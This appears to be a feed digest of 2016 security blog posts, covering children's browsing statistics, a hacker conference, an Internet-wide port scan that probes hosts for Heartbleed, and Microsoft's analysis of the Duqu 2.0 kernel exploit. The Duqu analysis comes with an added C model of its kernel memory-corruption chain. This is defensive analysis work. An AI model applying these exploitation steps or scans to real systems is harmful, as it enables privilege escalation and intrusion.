In recent years, “legal highs” have become widespread, and can be easily purchased online. The authorities in different countries have trouble keeping up and block hundreds of new legal high websites that appear online every day. Social media also contains numerous offers to buy “legal” narcotics.

Online shop selling “legal highs”

Synthetic drugs are by no means legal, let alone safe. The effect of consuming “spice” and “salts” is unpredictable and can lead to serious harm.

Electronic commerce

The popularity of this category shows just how interested children are in online shopping.

Popularity of the “Electronic commerce” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

As we can see, children and teenagers in China, Japan and the US visit online shops more frequently than others. Judging by the list of websites most often reported by the Parental Control module, the most popular online shops are Taobao in China, Uniqlo in Japan, and Amazon in the US.

Software, audio and video

An interesting trend can be seen in the “Software, audio, video” category. Over the last year and a half, visits by children and teenagers to websites where they can download or watch films and cartoons or listen to music have doubled.

Popularity of the “Software, audio, video” category worldwide, January 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

On the face of it, this website category doesn’t seem to be a big deal. However, you shouldn’t forget about pirated software and the malware it often carries – it may not hurt your child directly, but it could do quite a bit of damage to your computer.

Popularity of the “Software, audio, video” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Children in Japan watch cartoons and listen to music online more often than their peers in other countries. The figures for Russia and Mexico are the lowest. In Russia, this may be due to the fact that most young users listen to music on the VKontakte social network.

According to Kaspersky Lab’s Parental Control statistics, YouTube is the most popular website in this category.

Conclusion

The popularity of certain types of websites among children in different countries could be linked to each country’s cultural peculiarities and economic conditions.

If we look at the entire global picture, there is a downward trend in the popularity of Internet communication media among children and teenagers. The underlying reason is the increasing use of mobile technologies and the availability of smartphones in developed countries, the emergence of convenient mobile social media and Internet communication apps, and the fact that users can always stay online thanks to their mobile devices. However, in those countries where smartphones are less prevalent, children tend to use computers more often for online communications.

Interestingly, the lower the “Internet communication media” index is for a specific country, the more popular computer games are:

Popularity of the “Internet communication media” and “Computer games” categories in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

It’s interesting to see that children are becoming increasingly self-sufficient online: they choose which music they want to listen to, which films or cartoons they watch, and which products they want to – possibly – purchase.

Self-reliance is a positive trait for your child, but you still need to keep tabs on what they are doing online, just like in real life. Parental control software may just be an aid to safeguard your child from undesirable content, but it could well come in very handy – so don’t just dismiss it out of hand. For example, Kaspersky Lab’s product Safe Kids not only blocks undesirable sites but also notifies the parents of any alarming search requests that a child makes, and about their activities on social media. Since Safe Kids operates on mobile devices as well, parents can also get information about where their child is.

For today’s children, and especially teenagers, the Internet is their natural habitat. We do everything we can to keep it safe.

Feedly:Securelist / All Updates. BerlinSides …electrifying!



from Securelist / All Updates

It was the last weekend of May and just like every year, hackers, forensic experts and pentesters met at the University Hall in Berlin for the BerlinSides conference. ‘A con from hacker for hacker’.

BerlinSides is the successor of the PH-Neutral conference held by FX, who once said he’s going to host his conference for ten years. After that, Aluc stepped in and now runs the BerlinSides conference since 2010.

It started right after the PXE conference ended on Friday, 27 May, and lasts for four days. As usual, the last day was labeled “OpSec 4 Nerds” and held in a dojo. It’s about “hand to hand combat” and optional for all attendees who have good health insurance. Today is the last day of the conference and the exercises in the dojo are going on right now.

The schedule of the conference can be found here: http://ift.tt/1Uo7dWf

In contrast to the Chaos Computer Congress, this conference is by invitation only and just like in Las Vegas, what’s happening inside of BerlinSides stays inside. No journalists, cameras or any recording devices are allowed. Speakers can go into details and give some unique insights in projects, incidents and new vulnerabilities.

0x100 people attended the conference this year and besides the talks I also enjoyed the networking, music and party. I met people I hadn’t seen for a while and some I had never met before, and we had some good discussions.

Kaspersky Lab is the premium sponsor of this year’s conference and we are happy to see such great events and to support the community.

My colleague Stefan Ortloff gave the opening talk, “Cross-Platform Malware To Attack The Bitcoin-Sphere”, with insights into an ongoing investigation he is conducting himself.

(Host Aluc on the right, me on the left side)

Due to the nature of this conference, there aren’t any further details I can add to this blog, but I’d like to thank Aluc for his commitment and I look forward to attending again next year!

Sunday, May 29, 2016

Feedly:Errata Security. Doing a 'full scan' of the Internet right now



from Errata Security

So I'm doing a "full" scan of the Internet, all TCP ports 0-65535 on all addresses. This explains the odd stuff you see from 209.126.230.7x.


I'm scanning at only 125kpps from 4 source IP addresses, or roughly 30kpps from each source address. This is so that I'll get below many thresholds for IDSs, which trigger when they see fast scans from a single address. The issue isn't to avoid detection, but to avoid generating work for people who get unnecessarily paranoid about the noise they see in their IDS logs.

This scan won't finish at this speed, of course; it won't even get close. Technically, it'd take 50 years to complete at this rate.

The point isn't to create a comprehensive scan, but to do a sampling scan. I'll let it run for a week like this, which will cover 0.1% of the Internet, and then stop the scan.

What am I looking for? I don't know. I'm just doing something weird in order to see what happens. With that said, I am testing any port I connect to with Heartbleed. This should give us an estimation of how many Internet-of-Things devices are still vulnerable to that bug. I'm also interested to see how many things allow connections to port 0.

I'm also interested in seeing those devices/firewalls that respond with a SYN-ACK to any SYN. That's why, in the above picture, the "found" count is so high. I haven't actually found many real things, but it looks like it because these devices send SYN-ACKs without actually establishing TCP connections.

Anyway, send me a tweet @erratarob with information on how you perceive this incoming scan. Is your firewall and IDS handling it well? or do you have messed up configuration/policies where this causes more noise/concern than is warranted?
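A filter for the inflated "found" count the post describes, added here as an example; it is not Rob Graham's code and does not parse his scanner's real output, which the post does not show. The input format (one `open tcp <port> <ip>` line per SYN-ACK) and the sample lines are constructed for the demo. It tallies hits per host and flags any host that answered on more sampled ports than a real machine plausibly has listeners, which is the signature of a device that SYN-ACKs every SYN.

```c
/* Added example: separate SYN-ACK-to-anything devices from real finds in
 * sampled scan results. Input format and sample lines are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct host_tally {
    char     ip[16];
    unsigned hits;    /* ports on which this host answered with SYN-ACK */
};

/* Tally SYN-ACK hits per host from "open tcp <port> <ip>" lines.
 * Returns the number of distinct hosts seen, or -1 if the table is full. */
int tally_hits(const char *const *lines, size_t nlines,
               struct host_tally *hosts, size_t max_hosts)
{
    size_t count = 0;
    for (size_t i = 0; i < nlines; i++) {
        char ip[16];
        unsigned port;
        if (sscanf(lines[i], "open tcp %u %15s", &port, ip) != 2)
            continue;                       /* not a hit line: ignore */
        size_t j = 0;
        while (j < count && strcmp(hosts[j].ip, ip) != 0)
            j++;
        if (j == count) {                   /* first sighting of this host */
            if (count == max_hosts)
                return -1;
            strcpy(hosts[count].ip, ip);
            hosts[count].hits = 0;
            count++;
        }
        hosts[j].hits++;
    }
    return (int)count;
}

/* A host that answered on more than `threshold` of the sampled ports is
 * treated as a SYN-ACK-to-anything device and dropped from "found". */
int count_suspect_hosts(const struct host_tally *hosts, size_t n, unsigned threshold)
{
    int suspects = 0;
    for (size_t i = 0; i < n; i++)
        if (hosts[i].hits > threshold)
            suspects++;
    return suspects;
}

/* Constructed sample: one device answering on every probed port, one real
 * web server with two listeners, and a line that is not a hit at all. */
static const char *const sample_lines[] = {
    "open tcp 22 203.0.113.7",    "open tcp 23 203.0.113.7",
    "open tcp 80 203.0.113.7",    "open tcp 443 203.0.113.7",
    "open tcp 1337 203.0.113.7",  "open tcp 8080 203.0.113.7",
    "open tcp 31337 203.0.113.7", "open tcp 49152 203.0.113.7",
    "open tcp 60000 203.0.113.7", "open tcp 65535 203.0.113.7",
    "open tcp 80 198.51.100.2",   "open tcp 443 198.51.100.2",
    "# comment line emitted by the scanner",
};
#define SAMPLE_COUNT (sizeof sample_lines / sizeof sample_lines[0])

/* Runs the filter over the constructed sample; returns the suspect count. */
int demo_suspects(unsigned threshold)
{
    struct host_tally hosts[16];
    int n = tally_hits(sample_lines, SAMPLE_COUNT, hosts, 16);
    return n < 0 ? -1 : count_suspect_hosts(hosts, (size_t)n, threshold);
}

int main(void)
{
    struct host_tally hosts[16];
    int n = tally_hits(sample_lines, SAMPLE_COUNT, hosts, 16);
    for (int i = 0; i < n; i++)
        printf("%-15s %2u hits%s\n", hosts[i].ip, hosts[i].hits,
               hosts[i].hits > 8 ? "  <- answers everything, not a real find" : "");
    return 0;
}
```

The threshold depends on the sampling density: at 0.1% of 65536 ports per address a host sees roughly 65 probes, so a real host with a handful of listeners stays far below a threshold of 8 while a SYN-ACK-everything device sits near the full probe count. The more reliable check, as the post notes, is that these devices never complete the handshake, so a connect-and-read on a flagged port separates the two.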

Feedly:SANS Internet Storm Center, InfoCON: green. ISC Stormcast For Monday, May 30th 2016 http://ift.tt/1PacCkL, (Mon, May 30th)



from SANS Internet Storm Center, InfoCON: green

...(more)...

Feedly:Microsoft Malware Protection Center. Duqu 2.0 kernel exploitation technique analysis (part 1 of 2)



from Microsoft Malware Protection Center

Out of the multiple components used in the sophisticated Duqu 2.0 cyberespionage attack, we had a chance to look into one of the kernel exploits used for its elevation-of-privilege attack.

In June 2015, Kaspersky Lab discovered Duqu 2.0 and named it as such due to its close similarity to the original Duqu malware. Microsoft patched the vulnerability and published Security Bulletin MS15-061 on June 9, 2015.

This blog takes a closer look at the exploitation technique used and not the vulnerability itself.

The road to corruption and control

The nature of the vulnerability itself is very straightforward. The userland process registers its own ClientCopyImage callback; when the kernel invokes that callback, the callback destroys the window object and unregisters the associated class that triggered it, so the kernel continues with a dangling reference: a use-after-free. While the vulnerability is easy to understand, we found that the exploitation technique was very complicated.

By arranging for a new allocation to land on the freed memory right after the use-after-free, the attacker controls what happens next. The exploit calls the NtUserThunkedMenuItemInfo function, which allocates various objects in place of the freed memory location. It then allocates further objects to guarantee precise alignment, so that an attacker-controlled address is used as the pointer to the object passed to HMUnlockObject, which the kernel calls after the ClientCopyImage callback returns.

The pointer is positioned so that the instruction inside HMUnlockObject that decrements the object reference counter lands exactly on the cbclsExtra field of a tagCLS object instead. The tagCLS object’s address is calculated using the _MapDesktopObjectWin32k function.

    Figure 1: How the use-after-free condition works

In the code in Figure 2, rcx points inside one of the tagCLS objects that the fake object references. The highlighted instruction decrements the DWORD at that memory location.

    Figure 2: HMUnlockObject to corrupt a memory location

The corruption target, rcx+8, points to the cbclsExtra field of the tagCLS object, which the exploit pre-allocates by calling a series of Windows APIs. The field holds the size of the extra class memory that APIs such as GetClassLong and SetClassLong access.

    Figure 3: Original tagCLS object

The field is initialized to 0 in this case, which means there is no extra memory for this class. But with the HMUnlockObject instruction’s corruption of the memory, it becomes -1 or 0xffffffff in unsigned DWORD form.

    Figure 4: Corrupt tagCLS object

With the corrupt cbclsExtra field, the exploit can freely access extra memory address space using GetClassLong and SetClassLong API sets.

Because the code uses a ja (jump if above) instruction to check the APIs’ index parameter against the maximum, the comparison is unsigned, and no 32-bit index is above 0xffffffff. The check therefore passes for any index, which lets the exploit read and write a wide range of kernel memory relative to the tagCLS object.

    Figure 5: Out of bounds index

Opening up 64-bit memory address for read and write access

The tactic the attacker chose after the first corruption stage is also very interesting. It targets a specific member inside the tagWND structure. The location of tagWND and its members is again calculated using the _MapDesktopObjectWin32k function.

Having carefully calculated the tagWND object’s location in the kernel from the object returned by that call, the exploit locates the strName member inside the tagWND object by adding 0x0d8 to the base of the object.

    Figure 6: Locating tagWND.strName

It is worth understanding why the exploit uses this field. Even with wide read/write access to system memory, GetClassLong and SetClassLong do not cover the whole 64-bit address space, because their index is a 32-bit value even on a 64-bit system, and it is also not easy to know which address is actually being read or written. The exploit’s tactic is to corrupt the strName.Buffer member of tagWND and use it as the lever for further memory access. This gives full access across the 64-bit address range, with arbitrary data lengths.

For example, in the API log in Figure 7, the NtUserSetClassLongPtr API was used to set tagWND.strName.Buffer to fffff6fb7dbedf90, an arbitrary kernel memory location. When the InternalGetWindowText function is then called, it retrieves bytes from that tagWND.strName.Buffer location.

Therefore, if you know the address of the memory location, you can read any data from the kernel.

    Figure 7: Using InternalGetWindowText API to read from kernel memory

The reverse is also possible: writing any data to an arbitrary memory location. Use the NtUserSetClassLongPtr API to set tagWND.strName.Buffer, then call the NtUserDefSetText function; it writes the designated bytes to the target kernel memory location.

    Figure 8: Using NtUserDefSetText API to write to kernel memory

In this way, the exploit turns a simple use-after-free into a very powerful primitive with full kernel memory access. Yet even with full read and write access to kernel memory, achieving code execution is still hard.
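The chain described above, as an added user-mode model; this is not Microsoft's analysis code and not the Duqu 2.0 exploit. The struct layouts, the adjacency of the class and window objects in the modelled pool, the exact form of the index check and every name ending in _model are assumptions made for the demo, not win32k's definitions. It shows the three primitives in order: the misdirected decrement that turns cbclsExtra from 0 into 0xffffffff, the unsigned index check that then accepts an out-of-bounds SetClassLongPtr index reaching into a neighbouring tagWND, and the strName.Buffer pivot that turns the window-text calls into 64-bit arbitrary read and write.

```c
/* User-mode model of the Duqu 2.0 post-corruption primitives. Layouts, the
 * pool arrangement and the check in index_in_bounds() are demo assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {              /* model of tagCLS: only the fields the chain touches */
    uint32_t cref;            /* reference count; HMUnlockObject decrements a DWORD like this */
    uint32_t cbclsExtra;      /* size of extra class memory; 0 when none was requested */
    uint8_t  extra[8];        /* extra class bytes indexed by Get/SetClassLong */
} model_cls;

typedef struct {              /* model of tagWND.strName, a UNICODE_STRING-like triple */
    uint16_t Length, MaximumLength;
    uint64_t Buffer;          /* kernel pointer: the exploit's pivot field */
} model_string;

typedef struct {
    uint8_t      before[16];  /* stands in for the fields preceding strName */
    model_string strName;
} model_wnd;

typedef struct {              /* modelled pool: class object, then a window object; */
    model_cls cls;            /* the exploit derives the real distance from _MapDesktopObjectWin32k */
    model_wnd wnd;
} model_pool;

static uint64_t g_kernel_secret = 0x4141414141414141ULL; /* stands in for any kernel variable */

/* Model of the `ja` check in Figure 5: an unsigned comparison of the caller's
 * index against cbclsExtra. A negative int is a huge unsigned value and is
 * rejected while cbclsExtra is 0; once it is 0xffffffff almost every index passes. */
int index_in_bounds(uint32_t cbclsExtra, int32_t index)
{
    return (uint64_t)(uint32_t)index + sizeof(uint64_t) <= (uint64_t)cbclsExtra;
}

/* Address of extra-class slot `index`. The size guard is demo-only so the
 * model never leaves its own buffer; the kernel code has no second bound. */
static uint8_t *extra_slot(model_pool *pool, int32_t index)
{
    uint64_t off = offsetof(model_pool, cls) + offsetof(model_cls, extra) + (uint32_t)index;
    if (!index_in_bounds(pool->cls.cbclsExtra, index) || off + sizeof(uint64_t) > sizeof *pool)
        return NULL;
    return (uint8_t *)pool + off;
}

int set_class_long_ptr_model(model_pool *pool, int32_t index, uint64_t value)
{
    uint8_t *p = extra_slot(pool, index);
    if (!p) return 0;
    memcpy(p, &value, sizeof value);
    return 1;
}

/* HMUnlockObject's decrement of the DWORD at rcx+8 (Figure 2); the exploit
 * aims rcx so that rcx+8 is cbclsExtra rather than a reference count. */
void hm_unlock_object_model(uint32_t *refcount_slot) { (*refcount_slot)--; }

/* Figures 7 and 8: once strName.Buffer is attacker-chosen, the text APIs copy
 * from and to an arbitrary 64-bit address with an arbitrary length. */
void internal_get_window_text_model(const model_wnd *w, void *out, size_t n)
{
    memcpy(out, (const void *)(uintptr_t)w->strName.Buffer, n);
}
void def_set_text_model(model_wnd *w, const void *src, size_t n)
{
    memcpy((void *)(uintptr_t)w->strName.Buffer, src, n);
}

/* Runs the chain; on success *read_back holds the value read through the
 * pivot and g_kernel_secret has been overwritten with new_value. */
int duqu_chain_model(uint64_t *read_back, uint64_t new_value)
{
    model_pool pool;
    memset(&pool, 0, sizeof pool);
    int32_t buf_index = (int32_t)(offsetof(model_pool, wnd) + offsetof(model_wnd, strName)
                                  + offsetof(model_string, Buffer) - offsetof(model_cls, extra));
    /* stage 0: cbclsExtra == 0, so the out-of-bounds write is rejected */
    if (set_class_long_ptr_model(&pool, buf_index, 0)) return -1;
    /* stage 1: the misdirected decrement turns 0 into 0xffffffff (Figures 3, 4) */
    hm_unlock_object_model(&pool.cls.cbclsExtra);
    if (pool.cls.cbclsExtra != 0xffffffffu) return -2;
    /* stage 2: the same write now passes and lands on tagWND.strName.Buffer (Figure 6) */
    if (!set_class_long_ptr_model(&pool, buf_index, (uint64_t)(uintptr_t)&g_kernel_secret)) return -3;
    /* stage 3: full-width read and write through the window text APIs */
    internal_get_window_text_model(&pool.wnd, read_back, sizeof *read_back);
    def_set_text_model(&pool.wnd, &new_value, sizeof new_value);
    return 0;
}

/* Convenience wrapper: value read through the pivot, or 0 if the chain failed. */
uint64_t chain_read_value(uint64_t new_value)
{
    uint64_t v = 0;
    return duqu_chain_model(&v, new_value) == 0 ? v : 0;
}

int main(void)
{
    uint64_t seen = chain_read_value(0x4242424242424242ULL);
    printf("read through pivot: %#llx, kernel variable now: %#llx\n",
           (unsigned long long)seen, (unsigned long long)g_kernel_secret);
    return seen == 0;
}
```

The guard in extra_slot is the only thing keeping the model inside its own buffer; the real check has no second bound, which is why the 32-bit index on its own already reaches anything within 4 GB of the class object, and why the pivot to strName.Buffer is still needed for the rest of the address space and for reads and writes of arbitrary length.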

In the next blog, we will discuss the stage after this step, which is also quite interesting because it is about Windows kernel mitigations.

Acknowledgement: Thanks to Elia Florio for his advice on kernel land vulnerability analysis.

MMPC

Jeong Wook Oh
